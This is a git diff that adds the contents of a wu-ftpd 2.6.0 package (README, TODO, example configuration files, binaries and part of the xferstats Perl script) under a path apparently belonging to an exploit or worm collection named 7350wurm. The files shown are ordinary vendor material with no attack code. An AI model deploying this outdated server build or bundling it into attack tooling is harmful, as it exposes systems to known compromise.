diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/README b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/README
new file mode 100644
index 0000000..86e1553
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/README
@@ -0,0 +1,76 @@
+ 
+  Copyright (c) 1999 WU-FTPD Development Group.  
+  All rights reserved.
+  
+  Portions Copyright (c) 1980, 1985, 1988, 1989, 1990, 1991, 1993, 1994
+    The Regents of the University of California.
+  Portions Copyright (c) 1993, 1994 Washington University in Saint Louis.
+  Portions Copyright (c) 1996, 1998 Berkeley Software Design, Inc.
+  Portions Copyright (c) 1989 Massachusetts Institute of Technology.
+  Portions Copyright (c) 1998 Sendmail, Inc.
+  Portions Copyright (c) 1983, 1995, 1996, 1997 Eric P.  Allman.
+  Portions Copyright (c) 1997 by Stan Barber.
+  Portions Copyright (c) 1997 by Kent Landfield.
+  Portions Copyright (c) 1991, 1992, 1993, 1994, 1995, 1996, 1997
+    Free Software Foundation, Inc.  
+ 
+  Use and distribution of this software and its source code are governed 
+  by the terms and conditions of the WU-FTPD Software License ("LICENSE").
+ 
+  If you did not receive a copy of the license, it may be obtained online
+  at http://www.wu-ftpd.org/license.html.
+ 
+  $Id: README,v 1.5 1999/09/20 13:38:05 wuftpd Exp $
+ 
+=================
+= RELEASE NOTES =
+=================
+WU-FTP SERVER, RELEASE 2.6.0 - September, 1999
+wu-ftpd is a replacement ftp server for Un*x systems.  Besides supporting
+the ftp protocol defined in RFC 959, it adds the following features:
+    o  logging of transfers
+    o  logging of commands
+    o  on the fly compression and archiving
+    o  classification of users on type and location
+    o  per class limits
+    o  per directory upload permissions
+    o  restricted guest accounts
+    o  system wide and per directory messages.
+    o  directory alias
+    o  cdpath
+    o  filename filter
+    o  virtual host support
+This release is maintained by the WU-FTPD Development Group as a public
+service to the Internet.  Please report problems to the development group
+at wuftpd-questions@wu-ftpd.org.  Be sure to include a specific description
+of how to reproduce the bug, your hardware and software release levels and
+the name and version of the compiler you used to build the server.
+It is strongly recommended that you READ ALL THESE FILES before you start
+attempting to to install this software:
+        o INSTALL covers basic installation.
+        o NOTES covers some specific issues with respect to documentation
+          and some system specific information. 
+        o doc/HOWTO/VIRTUAL.FTP.SUPPORT outlines how to configure this 
+          feature of this server.
+For help setting up this server, you can try the following sources:
+    o  _Managing Internet Information Services_, An O'Reilly and Associates
+       book.  This book has many excellent chapters on setting up 
+       anonymous ftp sites using standard ftp servers as well as the wu-ftp
+       server.
+    o  WU-FTPD FAQs
+       - Koos van den Hout's FAQ at
+         http://www.cetis.hvu.nl/~koos/wu-ftpd-faq.html
+    o  WU-FTPD Resource Pages
+       - Kent Landfield's Resource Pages: http://www.landfield.com/wu-ftpd
+       - Academ Consulting Services' Page:
+         http://www.academ.com/academ/wu-ftpd
+    o  The wu-ftpd mailing list.  To subscribe, send email with the 
+       message body of "subscribe wuftpd-questions" to
+       wuftpd-questions-request@wu-ftpd.org.
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/TODO b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/TODO
new file mode 100644
index 0000000..0015159
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/TODO
@@ -0,0 +1,105 @@
+/****************************************************************************  
+ 
+  Copyright (c) 1999 WU-FTPD Development Group.  
+  All rights reserved.
+  
+  Portions Copyright (c) 1980, 1985, 1988, 1989, 1990, 1991, 1993, 1994
+    The Regents of the University of California.
+  Portions Copyright (c) 1993, 1994 Washington University in Saint Louis.
+  Portions Copyright (c) 1996, 1998 Berkeley Software Design, Inc.
+  Portions Copyright (c) 1989 Massachusetts Institute of Technology.
+  Portions Copyright (c) 1998 Sendmail, Inc.
+  Portions Copyright (c) 1983, 1995, 1996, 1997 Eric P.  Allman.
+  Portions Copyright (c) 1997 by Stan Barber.
+  Portions Copyright (c) 1997 by Kent Landfield.
+  Portions Copyright (c) 1991, 1992, 1993, 1994, 1995, 1996, 1997
+    Free Software Foundation, Inc.  
+ 
+  Use and distribution of this software and its source code are governed 
+  by the terms and conditions of the WU-FTPD Software License ("LICENSE").
+ 
+  If you did not receive a copy of the license, it may be obtained online
+  at http://www.wu-ftpd.org/license.html.
+ 
+  $Id: TODO,v 1.9 1999/09/23 05:42:30 wuftpd Exp $
+ 
+****************************************************************************/
+TODO 
+o Add a configuration option changing the behavior of the daemon when an
+  upload overwrites an existing file.  Version 2.5.0 of the daemon leaves the
+  original ownership and permissions unchanged.  This option would have the
+  overwrite obey the ownership and permissions specified on the upload
+  clause.  This feature will be added only if there appears to be a desire
+  for it.
+o Rewrite all configuration file handling for robustness and calrity.
+o Limit logins based upon system load.  From a patch submitted to the
+  mailing list by pschwan@@apk.net on Sep 27, 1997.  This closes Stan's TODO
+  item 18.  Phil has lost his patch.  I'm thinking about yanking the code
+  from sendmail to determine the system load and recreating Phil's work from
+  that base.
+o Limit logins and/or uploads based upon free space.  Take a look at how
+  sendmail determines how much space is available.
+o Add 'onupload' syntax to run external programs/scripts at the end of an
+  upload.  A Frequently Requested Feature.  From a request to the mailing
+  list from breif@@rol3.com on Aug 25, 1997.
+o Add 'virtual-retrieve' to run specified program and pipe output when a
+  given GET is handled.  If wildcards/globbing/regex is allowed, pass the
+  requested name to the program for processing.
+o Use a stats file in addition to or in place of SETPROCTITLE.  From a patch
+  referenced on the mailing list by mjm@@doc.ic.ac.uk on Jun 12, 1997.  This
+  closes Stan's TODO items 4 and 6 and possbily item 8.  I'm thinking about
+  yanking the code from Apache's scoreboard to use as a base for this.
+o Add ability to limit connections by domain. 
+o Enhance ftp-pid files to become single file with continuous process
+   status.
+o Write ftpstat program, including -k option to kill off all FTP daemons
+o Write dynamic ftp monitoring program
+o Add ability to log different info to different files
+o Write ftplogd.  Ftp processes send log info to ftplogd which configurably
+    writes data to a lot of different places (syslog[@loghost], logfile(s)).
+o Add ability to limit total connections from any domain.
+o Include descriptive ls program, add ".private" file to disable
+    directory listings...
+o Include system load as a limit parameter (load < xxx, maxusers = nnn)
+o Log more information into PID files:
+        - files/bytes transferred
+        - current action (a la SETPROCNAME)
+        - remote host
+        - classes
+o Write an ftp status program to take advantage of new PID file
+o Add exclusions available in the timeout or transfer limiting code. 
+  We really should be able to exclude some sites from those limitations.
+  Reasoning:
+        1. Company has a public ftp site where limitations
+           should exist but does not want to see their
+           internal uses limited in any way.
+        2. Public sites that have official mirrors should
+           be able to grant exclusions to the official 
+           mirror sites so that the mirroring process is
+           not aborted leaving the official mirrors in an
+           possible inconsistent state until the next 
+           mirroring cycle.
+o Investigate the feasability of adding rlimits as configuration options.
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpaccess b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpaccess
new file mode 100644
index 0000000..26a9e80
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpaccess
@@ -0,0 +1,19 @@
+class   all   real,guest,anonymous  *
+limit   all   10   Any              /etc/msgs/msg.dead
+readme  README*    login
+readme  README*    cwd=*
+message /welcome.msg            login
+message .message                cwd=*
+compress        yes             all
+tar             yes             all
+log commands real
+log transfers anonymous,real inbound,outbound
+shutdown /etc/shutmsg
+email user@hostname
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpaccess.heavy b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpaccess.heavy
new file mode 100644
index 0000000..9d4d1fc
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpaccess.heavy
@@ -0,0 +1,59 @@
+loginfails 2
+# HEY YOU!  Yeah, you with the editor.
+# change the following line, or delete it, OK?
+class   local   real,guest,anonymous *.domain 0.0.0.0
+class   remote  real,guest,anonymous *
+limit   local   20  Any                 /etc/msgs/msg.toomany
+limit   remote  100 SaSu|Any1800-0600   /etc/msgs/msg.toomany
+limit   remote  60  Any                 /etc/msgs/msg.toomany
+readme  README*    login
+readme  README*    cwd=*
+message /welcome.msg            login
+message .message                cwd=*
+compress        yes             local remote
+tar             yes             local remote
+# allow use of private file for SITE GROUP and SITE GPASS?
+private         yes
+# passwd-check  <none|trivial|rfc822>  [<enforce|warn>]
+passwd-check    rfc822  warn
+log commands real
+log transfers anonymous,real inbound,outbound
+shutdown /etc/shutmsg
+# all the following default to "yes" for everybody
+delete          no      guest,anonymous         # delete permission?
+overwrite       no      guest,anonymous         # overwrite permission?
+rename                  no              guest,anonymous                 # rename permission?
+chmod           no      anonymous               # chmod permission?
+umask           no      anonymous               # umask permission?
+# specify the upload directory information
+upload  /var/ftp  *             no     nobody   nogroup 0000 nodirs
+upload  /var/ftp  /bin          no
+upload  /var/ftp  /etc          no
+upload  /var/ftp  /incoming     yes     root    daemon  0600 dirs
+# directory aliases...  [note, the ":" is not required]
+alias   inc:    /incoming
+# cdpath
+cdpath  /incoming
+cdpath  /pub
+cdpath  /
+# path-filter...
+path-filter  anonymous  /etc/pathmsg  ^[-A-Za-z0-9_\.]*$  ^\.  ^-
+path-filter  guest      /etc/pathmsg  ^[-A-Za-z0-9_\.]*$  ^\.  ^-
+# specify which group of users will be treated as "guests".
+guestgroup ftponly
+email user@hostname
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpconversions b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpconversions
new file mode 100644
index 0000000..e7fc6db
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpconversions
@@ -0,0 +1,9 @@
+ :.Z:  :  :/bin/compress -d -c %s:T_REG|T_ASCII:O_UNCOMPRESS:UNCOMPRESS
+ :   : :.Z:/bin/compress -c %s:T_REG:O_COMPRESS:COMPRESS
+ :.gz: :  :/bin/gzip -cd %s:T_REG|T_ASCII:O_UNCOMPRESS:GUNZIP
+ :   : :.gz:/bin/gzip -9 -c %s:T_REG:O_COMPRESS:GZIP
+ :   : :.tar:/bin/tar -c -f - %s:T_REG|T_DIR:O_TAR:TAR
+ :   : :.tar.Z:/bin/tar -c -Z -f - %s:T_REG|T_DIR:O_COMPRESS|O_TAR:TAR+COMPRESS
+ :   : :.tar.gz:/bin/tar -c -z -f - %s:T_REG|T_DIR:O_COMPRESS|O_TAR:TAR+GZIP
+ :   : :.crc:/bin/cksum %s:T_REG::CKSUM
+ :   : :.md5:/bin/md5sum %s:T_REG::MD5SUM
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpconversions.solaris b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpconversions.solaris
new file mode 100644
index 0000000..3f3b2c2
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpconversions.solaris
@@ -0,0 +1,2 @@
+ :.Z:  :  :/usr/bin/compress -d -c %s:T_REG|T_ASCII:O_UNCOMPRESS:UNCOMPRESS
+ :   : :.Z:/usr/bin/compress -c %s:T_REG:O_COMPRESS:COMPRESS
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpgroups b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpgroups
new file mode 100644
index 0000000..2ca5fe1
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpgroups
@@ -0,0 +1 @@
+test:ENCRYPTED PASSWORD HERE:archive
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftphosts b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftphosts
new file mode 100644
index 0000000..231c232
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftphosts
@@ -0,0 +1,7 @@
+# Example host access file
+#
+# Everything after a '#' is treated as comment,
+# empty lines are ignored
+    allow   bartm   somehost.domain
+    deny    fred    otherhost.domain 131.211.32.*
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpservers b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpservers
new file mode 100644
index 0000000..857fb93
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpservers
@@ -0,0 +1,25 @@
+#
+# ftpservers file:
+# 
+# Format of the file is:
+#    ipaddr/hostname   directory-containing-configuration-files
+#
+#    10.196.145.10   /etc/ftpd/ftpaccess.somedomain/
+#    10.196.145.200  /etc/ftpd/ftpaccess.someotherdomain/
+#    some.domain      INTERNAL
+# 
+# The server parses the file and tries to match the IP address connected
+# to one found in the ftpservers file.  If a match is found then the path
+# to the specified directory that contains the configuration files
+# for that specific domain is returned.  If a match is not found, or 
+# an invalid directory path is encountered like above, default 
+# paths to the configuration files to use are returned.
+#
+# You can use the actual IP address or a specific hostname.
+#
+#    10.196.145.20      /etc/ftpd/config/faqs.org/
+#    ftp.some.domain    /etc/ftpd/config/faqs.org/
+#
+# As usual, comments and blanklines are ignored.
+#
+####
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpusers b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpusers
new file mode 100644
index 0000000..59a8855
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/doc/wu-ftpd-2.6.0/examples/ftpusers
@@ -0,0 +1,14 @@
+root
+bin
+boot
+daemon
+digital
+field
+gateway
+guest
+nobody
+operator
+ris
+sccs
+sys
+uucp
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man1/ftpcount.1.gz b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man1/ftpcount.1.gz
new file mode 100644
index 0000000..1d9a145
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man1/ftpcount.1.gz
Binary files differ
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man1/ftpwho.1.gz b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man1/ftpwho.1.gz
new file mode 100644
index 0000000..f8abca0
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man1/ftpwho.1.gz
Binary files differ
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/ftpaccess.5.gz b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/ftpaccess.5.gz
new file mode 100644
index 0000000..a77e3cf
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/ftpaccess.5.gz
Binary files differ
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/ftpconversions.5.gz b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/ftpconversions.5.gz
new file mode 100644
index 0000000..dbfb252
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/ftpconversions.5.gz
Binary files differ
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/ftphosts.5.gz b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/ftphosts.5.gz
new file mode 100644
index 0000000..78c186d
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/ftphosts.5.gz
Binary files differ
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/ftpservers.5.gz b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/ftpservers.5.gz
new file mode 100644
index 0000000..e8a83eb
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/ftpservers.5.gz
Binary files differ
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/xferlog.5.gz b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/xferlog.5.gz
new file mode 100644
index 0000000..e3be34e
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man5/xferlog.5.gz
Binary files differ
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man8/ftpd.8.gz b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man8/ftpd.8.gz
new file mode 100644
index 0000000..5133a64
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man8/ftpd.8.gz
Binary files differ
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man8/ftprestart.8.gz b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man8/ftprestart.8.gz
new file mode 100644
index 0000000..0b3a698
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man8/ftprestart.8.gz
Binary files differ
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man8/ftpshut.8.gz b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man8/ftpshut.8.gz
new file mode 100644
index 0000000..1d425e5
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man8/ftpshut.8.gz
Binary files differ
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man8/privatepw.8.gz b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man8/privatepw.8.gz
new file mode 100644
index 0000000..e5204dd
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/man/man8/privatepw.8.gz
Binary files differ
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/ckconfig b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/ckconfig
new file mode 100755
index 0000000..63b1333
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/ckconfig
Binary files differ
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/ftprestart b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/ftprestart
new file mode 100755
index 0000000..7cabc89
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/ftprestart
Binary files differ
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/ftpshut b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/ftpshut
new file mode 100755
index 0000000..e14dca9
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/ftpshut
Binary files differ
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/in.ftpd b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/in.ftpd
new file mode 100755
index 0000000..7e51b81
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/in.ftpd
Binary files differ
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/in.wuftpd b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/in.wuftpd
new file mode 120000
index 0000000..e922eaf
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/in.wuftpd
@@ -0,0 +1 @@
+in.ftpd
+\ No newline at end of file
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/privatepw b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/privatepw
new file mode 100755
index 0000000..cd2aa6a
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/privatepw
Binary files differ
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/wu.ftpd b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/wu.ftpd
new file mode 120000
index 0000000..e922eaf
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/wu.ftpd
@@ -0,0 +1 @@
+in.ftpd
+\ No newline at end of file
diff --git a/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/xferstats b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/xferstats
new file mode 100755
index 0000000..6bb1640
--- /dev/null
+++ b/exploits/7350wurm/rpm/wu-ftpd-2.6.0/usr/sbin/xferstats
@@ -0,0 +1,338 @@
+#! /usr/bin/perl
+#
+# Copyright (c) 1999 WU-FTPD Development Group.
+# All rights reserved.
+# 
+# Portions Copyright (c) 1980, 1985, 1988, 1989, 1990, 1991, 1993, 1994 
+#    The Regents of the University of California.  
+# Portions Copyright (c) 1993, 1994 Washington University in Saint Louis.  
+# Portions Copyright (c) 1989 Massachusetts Institute of Technology.  
+# Portions Copyright (c) 1998 Sendmail, Inc.
+# Portions Copyright (c) 1983, 1995, 1996, 1997 Eric P. Allman.  
+# Portions Copyright (c) 1996, 1998 Berkeley Software Design, Inc.  
+# Portions Copyright (C) 1991, 1992, 1993, 1994, 1995 1996, 1997 
+#    Free Software Foundation, Inc.  
+# Portions Copyright (c) 1997 Stan Barber.  
+# Portions Copyright (c) 1997 Kent Landfield.
+# 
+# Use and distribution of this software and its source code are governed by 
+# the terms and conditions of the WU-FTPD Software License ("LICENSE").
+# 
+# If you did not receive a copy of the license, it may be obtained online at
+# http://www.wu-ftpd.org/license.html.
+# 
+# $Id: xferstats,v 1.4 1999/08/27 14:07:36 wuftpd Exp $
+#
+# ---------------------------------------------------------------------------
+#
+# USAGE: xferstats <options>
+#
+# OPTIONS:
+#       -f <filename>   Use <filename> for the log file
+#       -r              include real users 
+#       -a              include anonymous users 
+#       -h              include report on hourly traffic
+#       -d              include report on domain traffic
+#       -t              report on total traffic by section
+#       -D <domain>     report only on traffic from <domain>
+#       -l <depth>      Depth of path detail for sections
+#       -s <section>    Section to report on, For example: -s /pub will report
+#                               only on paths under /pub
+#
+# ---------------------------------------------------------------------------
+#
+# edit the next two lines to customize for your domain.
+# This will allow your domain to be seperated in the domain listing.
+$hostname = `hostname`;
+$hostname =~ y/A-Z/a-z/;
+@DomainName = split /\./, $hostname;
+$mydom2 = pop(@DomainName);
+$mydom1 = pop(@DomainName);
+# edit the next line to customize for your default log file
+$usage_file = "/var/log/xferlog";
+# Edit the following lines for default report settings.
+# Entries defined here will be over-ridden by the command line.
+$opt_h = 1; 
+$opt_d = 0;
+$opt_t = 1;
+$opt_l = 3;
+require 'getopts.pl';
+&Getopts('f:rahdD:l:s:');
+if ($opt_r) { $real = 1;}
+if ($opt_a) { $anon = 1;}
+if ($real == 0 && $anon == 0) { $anon = 1; }
+if ($opt_f) {$usage_file = $opt_f;}
+open (LOG,$usage_file) || die "Error opening usage log file: $usage_file\n";
+if ($opt_D) {print "Transfer Totals include the '$opt_D' domain only.\n";
+             print "All other domains are filtered out for this report.\n\n";}
+if ($opt_s) {print "Transfer Totals include the '$opt_s' section only.\n";
+             print "All other sections are filtered out for this report.\n\n";}
+line: while (<LOG>) {
+   @line = split;
+   next if ($#line <  16);
+   next if (!$anon && $line[12] eq "a");
+   next if (!$real && $line[12] eq "r");
+ 
+   $daytime = substr($_, 0, 10) . substr($_, 19, 5);
+   $time = substr($_,11,2); 
+   if ($line[8] eq "\.") { $line[8] = "/unreadable/filename";}
+   next if (substr($line[8],0,length("$opt_s")) ne "$opt_s");
+   $line[8] = substr($line[8],length("$opt_s"));
+   @path = split(/\//, $line[8]);
+#
+# Why was the original xferstats dropping leading 1 character path
+# segments???
+#
+#  while (length($path[1]) <= 1) {
+#     shift @path;
+#     next line if ($#path == -1);
+#  }
+# Things in the top-level directory are assumed to be informational files
+   if ($#path == 1)
+      { $pathkey = "Index/Informational Files"; }
+      else {
+        $pathkey = "";
+        for ($i=1; $i <= $#path-1 && $i <= $opt_l;$i++) {
+                $pathkey = $pathkey . "/" . $path[$i];
+                }
+        }
+   $line[6] =~ tr/A-Z/a-z/;
+   $systemfiles{$line[6]}++;
+   @address = split(/\./, $line[6]);
+   $domain = $address[$#address];
+   if ($domain eq "$mydom2" && $address[$#address-1] eq "$mydom1")
+      { $domain = $mydom1 . "." . $mydom2; }
+   if ( @address < 2 ||
+    (substr($address[0],0,1) ge "0" && substr($address[0],0,1) le "9"))
+      { $domain = "unresolved"; }
+   $count = 1;
+   if ($opt_D)
+     {if (substr($domain,0,length("$opt_D")) eq "$opt_D" ) { $count = 1;} else
+     {$count = 0;}
+     }
+   if ($count) {
+   $xferfiles++;                                # total files sent
+   $xfertfiles++;                               # total files sent
+   $xferfiles{$daytime}++;                      # files per day
+   $groupfiles{$pathkey}++;                     # per-group accesses
+   $domainfiles{$domain}++;
+   $xfersecs{$daytime}    += $line[5];          # xmit seconds per day
+   $domainsecs{$domain}   += $line[5];          # xmit seconds for domain
+   $xferbytes{$daytime}   += $line[7];          # bytes per day
+   $domainbytes{$domain}  += $line[7];          # xmit bytes to domain
+   $xferbytes             += $line[7];          # total bytes sent
+   $groupbytes{$pathkey}  += $line[7];          # per-group bytes sent
+   $xfertfiles{$time}++;                        # files per hour
+   $xfertsecs{$time}      += $line[5];          # xmit seconds per hour
+   $xfertbytes{$time}     += $line[7];          # bytes per hour
+   $xfertbytes            += $line[7];          # total bytes sent
+   }
+}
+close LOG;
+@syslist = keys(systemfiles);
+@dates = sort datecompare keys(xferbytes);
+if ($xferfiles == 0) {die "There was no data to process.\n";}
+print "TOTALS FOR SUMMARY PERIOD ", $dates[0], " TO ", $dates[$#dates], "\n\n";
+printf ("Files Transmitted During Summary Period  %12.0f\n", $xferfiles);
+printf ("Bytes Transmitted During Summary Period  %12.0f\n", $xferbytes); 
+printf ("Systems Using Archives                   %12.0f\n\n", $#syslist+1);
+printf ("Average Files Transmitted Daily          %12.0f\n",
+   $xferfiles / ($#dates + 1));
+printf ("Average Bytes Transmitted Daily          %12.0f\n",
+   $xferbytes / ($#dates + 1));
+format top1 =
+Daily Transmission Statistics
+                 Number Of    Number of    Average    Percent Of  Percent Of
+     Date        Files Sent  Bytes  Sent  Xmit  Rate  Files Sent  Bytes Sent
+---------------  ----------  -----------  ----------  ----------  ----------
+.
+format line1 =
+@<<<<<<<<<<<<<<  @>>>>>>>>>  @>>>>>>>>>>  @>>>>>>>>>  @>>>>>>>    @>>>>>>>  
+$date,           $nfiles,    $nbytes,     $avgrate,   $pctfiles,  $pctbytes
+.
+$^ = top1;
+$~ = line1;
+foreach $date ( sort datecompare keys(xferbytes) ) {
+   $nfiles   = $xferfiles{$date};
+   $nbytes   = $xferbytes{$date};
+   $avgrate  = sprintf("%5.1f KB/s", $xferbytes{$date}/$xfersecs{$date}/1000);
+   $pctfiles = sprintf("%8.2f", 100*$xferfiles{$date} / $xferfiles);
+   $pctbytes = sprintf("%8.2f", 100*$xferbytes{$date} / $xferbytes);
+   write;
+}
+if ($opt_t) {
+format top2 =
+Total Transfers from each Archive Section (By bytes)
+                                                 ---- Percent  Of ----
+     Archive Section      Files Sent Bytes Sent  Files Sent Bytes Sent
+------------------------- ---------- ----------- ---------- ----------
+.
+format line2 =
+@<<<<<<<<<<<<<<<<<<<<<<<< @>>>>>>>>> @>>>>>>>>>> @>>>>>>>   @>>>>>>>
+$section,                 $files,    $bytes,     $pctfiles, $pctbytes
+.
+$| = 1;
+$- = 0;
+$^ = top2;
+$~ = line2;
+foreach $section ( sort bytecompare keys(groupfiles) ) {
+   $files = $groupfiles{$section};
+   $bytes = $groupbytes{$section};
+   $pctbytes = sprintf("%8.2f", 100 * $groupbytes{$section} / $xferbytes);
+   $pctfiles = sprintf("%8.2f", 100 * $groupfiles{$section} / $xferfiles);
+   write;
+}
+if ( $xferfiles < 1 ) { $xferfiles = 1; }
+if ( $xferbytes < 1 ) { $xferbytes = 1; }
+}
+if ($opt_d) {
+format top3 =
+Total Transfer Amount By Domain
+             Number Of    Number of     Average    Percent Of  Percent Of
+Domain Name  Files Sent   Bytes Sent   Xmit  Rate  Files Sent  Bytes Sent
+-----------  ----------  ------------  ----------  ----------  ----------
+.
+format line3 =
+@<<<<<<<<<<  @>>>>>>>>>  @>>>>>>>>>>>  @>>>>>>>>>  @>>>>>>>    @>>>>>>>  
+$domain,     $files,     $bytes,       $avgrate,   $pctfiles,  $pctbytes
+.
+$- = 0;
+$^ = top3;
+$~ = line3;
+foreach $domain ( sort domnamcompare keys(domainfiles) ) {
+   if ( $domainsecs{$domain} < 1 ) { $domainsecs{$domain} = 1; }
+   $files = $domainfiles{$domain};
+   $bytes = $domainbytes{$domain};
+   $avgrate  = sprintf("%5.1f KB/s",
